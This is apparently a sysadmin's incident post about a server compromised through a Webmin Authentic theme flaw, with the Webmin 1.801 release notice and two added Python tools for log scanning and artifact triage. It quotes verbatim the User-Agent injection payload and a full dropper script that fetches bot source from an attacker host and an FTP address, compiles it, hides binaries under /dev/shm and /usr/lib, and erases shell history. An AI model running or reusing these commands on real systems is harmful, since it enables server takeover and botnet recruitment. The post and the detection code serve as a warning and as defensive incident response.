Hi Guys,
Webmin has/had a security hole in one of their templates, I just found a hacked colocated machine that was obviously not patched in time:
nice script, tells you which IPs to blackhole :)
The Entrance was:
in the HTTP_USER_AGENT header: HTTP_USER_AGENT=(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || bash -c "wget http://ugotownedz.org/mg -O /tmp/mg;curl -o /tmp/mg http://ugotownedz.org/mg;sh /tmp/mg;rm -rf /tmp/mg"
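A defender-side check for that entry vector, added here as an example and not part of Silvan's post: it scans web-server access-log lines for User-Agent values that carry shell syntax (a pipe into a shell, `sh -c`, a download command, a shell loop, a write to /tmp) and lists the source addresses behind them. The log layout (Apache combined format), the sample lines and the placeholder download host `attacker.example` are constructed assumptions; Webmin's own miniserv.log may lay its fields out differently, so adjust `LOG_RE` before pointing this at one.

```python
import re

# Constructed sample access-log lines in Apache "combined" format (an
# assumption: the post does not say which log the header was recovered from).
# The second line carries the same shape of payload as the one quoted in the
# post, with the download host replaced by a placeholder.
SAMPLE_LOG = r'''
203.0.113.10 - - [10/Feb/2016:12:00:01 +0000] "GET /session_login.cgi HTTP/1.1" 200 1543 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"
198.51.100.7 - - [10/Feb/2016:12:00:05 +0000] "GET /session_login.cgi HTTP/1.1" 200 1543 "-" "(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || bash -c "wget http://attacker.example/mg -O /tmp/mg;curl -o /tmp/mg http://attacker.example/mg;sh /tmp/mg;rm -rf /tmp/mg""
203.0.113.11 - - [10/Feb/2016:12:00:09 +0000] "GET / HTTP/1.1" 401 381 "-" "curl/7.47.0"
'''

# Combined format: the User-Agent is the last quoted field. It is matched
# greedily so that double quotes inside an injected payload stay in the UA
# instead of truncating it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Shell syntax that has no business in a browser identification string.
INDICATORS = [
    (re.compile(r'\|\s*(?:ba)?sh\b'), 'pipe into shell'),
    (re.compile(r'\b(?:ba)?sh\s+-c\b'), 'sh -c invocation'),
    (re.compile(r'\b(?:wget|curl)\b.*https?://'), 'download command'),
    (re.compile(r'\bfor\s+\w+\s+in\b'), 'shell loop'),
    (re.compile(r'\$\(|`'), 'command substitution'),
    (re.compile(r'/tmp/\S+'), 'write to /tmp'),
]


def classify_user_agent(ua):
    """Return the names of the indicators that fire on one User-Agent value."""
    return [name for rx, name in INDICATORS if rx.search(ua)]


def scan_log(text):
    """Parse combined-format lines and report those whose UA looks like a shell payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_user_agent(m.group('ua'))
        if reasons:
            findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'status': m.group('status'), 'reasons': reasons})
    return findings


def hosts_to_block(findings):
    """Distinct source addresses behind the findings, for a firewall drop list."""
    return sorted({f['ip'] for f in findings})


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} status={f['status']} -> {', '.join(f['reasons'])}")
    print('block:', ' '.join(hosts_to_block(found)))
```

The indicators are deliberately narrow: semicolons and parentheses alone are normal in browser strings, so only constructs that make sense as shell (a loop, a pipe into a shell, a fetch-and-run) are counted, and a genuine `curl/7.47.0` client is not flagged.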
-----
Webmin 1.801 released. The primary reason for this update is to fix a serious security issue that affects users using the Authentic theme versions prior to 18.00 - All users should upgrade ASAP! It also includes tracking for recent logins, better behavior when updating multiple packages, translation updates and more. You can get it from the Webmin downloads page, or from our YUM or APT repositories.
-----
I guess this might be useful for some here to know ;)
Silvan
----
#!/bin/sh
apt-get -y install gcc || aptitude -y install gcc || yum -y install gcc
apt-get -y install libssh || aptitude -y install libssh || yum -y install libssh
apt-get -y install libssh-dev || aptitude -y install libssh-dev || yum -y install libssh-dev
wget http://ugotownedz.org/pass.h -o /tmp/pass.h || curl -o /tmp/pass.h http://ugotownedz.org/pass.h
wget http://ugotownedz.org/PwNzbot.c -O /tmp/PwNzbot.c || curl -o /tmp/PwNzbot.c http://ugotownedz.org/PwNzbot.c
gcc -o /tmp/a /tmp/PwNzbot.c
mv /tmp/a /dev/shm/aaaa
mv /tmp/a /usr/lib/.aaaa
chmod +x /dev/shm/aaaa
chmod +x /usr/lib/.aaaa
/usr/lib/.aaaa
/dev/shm/aaaa
chmod +x /tmp/a
/tmp/a
wget http://ugotownedz.org/pmabot.c -O pmabot.c || curl -o pmabot.c http://ugotownedz.org/pmabot.c
gcc -o .X0-unix pmabot.c
./.X0-unix
wget http://ugotownedz.org/PwNzbot.c -O /tmp/a.c || curl -o /tmp/PwNzbot.c http://ugotownedz.org/a.c
gcc -o /tmp/a /tmp/PwNzbot.c
mv /tmp/a /dev/shm/weed
mv /tmp/a /usr/lib/.weed
chmod +x /dev/shm/weed
chmod +x /usr/lib/.weed
/usr/lib/.weed
/dev/shm/.weed
chmod +x /tmp/.weed
/tmp/.weed
rm -rf /tmp/PwNzbot.*
rm -rf /tmp/a.*
rm -rf /tmp/pmabot.*
rm -rf /tmp/kait.
rm -rf pmabot.*
rm -rf PwNzbot.*
rm -rf a.*
wget ftp://67.68.120.2/apache.ico || curl -O ftp://67.68.120.2/apache.ico
perl apache.ico
rm -rf .bash_history
wget http://ugotownedz.org/kait.c -O /tmp/kait.c || curl -o kait.c http://ugotownedz.org/kait.c
gcc -o /tmp/.X1-unix /tmp/kait.c -lssh
/tmp/.X1-unix
wget ftp://67.68.120.2/PK.ico || curl -O ftp://67.68.120.2/PK.ico
php PK.ico
rm -rf .bash_history
rm -rf PK.ico.1
rm -rf kait.*
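A triage sweep for what that dropper leaves behind, added here as an example and not taken from the post or from Webmin: the file paths and download hosts are the ones in the quoted script, `sweep_paths` checks a given root for those files, and `executables_in_shm` separately flags any executable under /dev/shm, which is a generic heuristic of mine rather than something the script itself points to. The demo tree it builds in a temporary directory is constructed; for real use point the two functions at `/` or at a mounted image of the affected disk.

```python
import os
import stat
import tempfile
from pathlib import Path

# Files the quoted dropper writes or executes, relative to the filesystem
# root so the sweep can be pointed at a mounted disk image rather than the
# live system. /dev/shm/.weed and /tmp/.weed are executed but never created
# by the script as written, so they are left out.
DROPPER_PATHS = [
    "dev/shm/aaaa", "usr/lib/.aaaa",
    "dev/shm/weed", "usr/lib/.weed",
    "tmp/.X1-unix",   # named to resemble the legitimate /tmp/.X11-unix socket directory
    "tmp/a", "tmp/mg", "tmp/pass.h", "tmp/PwNzbot.c", "tmp/kait.c",
]

# Download hosts the dropper contacts, for grepping proxy logs or shell history.
DROPPER_HOSTS = ["ugotownedz.org", "67.68.120.2"]

EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def sweep_paths(root="/"):
    """Return the dropper paths that exist under root."""
    base = Path(root)
    return sorted(p for p in DROPPER_PATHS if (base / p).exists())


def executables_in_shm(root="/"):
    """Generic heuristic (mine, not from the post): /dev/shm holds shared
    memory, not programs, so a regular file with an execute bit there is
    worth a look whatever it is called."""
    shm = Path(root) / "dev/shm"
    hits = []
    if not shm.is_dir():
        return hits
    for p in shm.rglob("*"):
        try:
            st = p.lstat()
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & EXEC_BITS:
            hits.append(str(p.relative_to(root)))
    return sorted(hits)


def hosts_in_text(text):
    """Which of the dropper's download hosts appear in a blob of log or history text."""
    return sorted(h for h in DROPPER_HOSTS if h in text)


def make_demo_root():
    """Build a constructed directory tree that mimics a host hit by the dropper."""
    root = tempfile.mkdtemp(prefix="triage-demo-")
    for d in ("dev/shm", "usr/lib", "tmp/.X11-unix"):
        os.makedirs(os.path.join(root, d))
    bot = os.path.join(root, "dev/shm/aaaa")
    Path(bot).write_bytes(b"\x7fELF placeholder")  # constructed stand-in for the compiled bot
    os.chmod(bot, 0o755)
    Path(root, "usr/lib/.weed").write_bytes(b"")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    print("dropper artifacts:", sweep_paths(root))
    print("executables in /dev/shm:", executables_in_shm(root))
    print("hosts seen:", hosts_in_text("wget http://ugotownedz.org/mg -O /tmp/mg"))
```

Because the script ends with `rm -rf .bash_history`, the shell history of the account Webmin ran as is not a reliable source here; the files in /dev/shm and /usr/lib, the running processes named after them, and outbound connections to the two hosts are what will usually still be visible.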